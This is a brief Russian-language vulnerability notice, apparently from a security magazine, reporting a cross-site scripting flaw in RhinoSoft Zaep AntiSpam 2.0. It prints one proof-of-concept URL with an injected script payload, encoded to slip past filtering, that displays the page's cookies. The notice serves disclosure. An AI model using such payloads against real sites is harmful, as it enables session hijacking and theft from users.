Рекомендуем почитать:


Хакер #311. Сетевые протоколы под микроскопом
Программа: Zaep AntiSpam 2.0
Уязвимость обнаружена в RhinoSoft Zaep AntiSpam. Удаленный пользователь может выполнить XSS нападение.
Пример:
http://[target]/?key=<script>alert (document.cookie)<%252Fscript>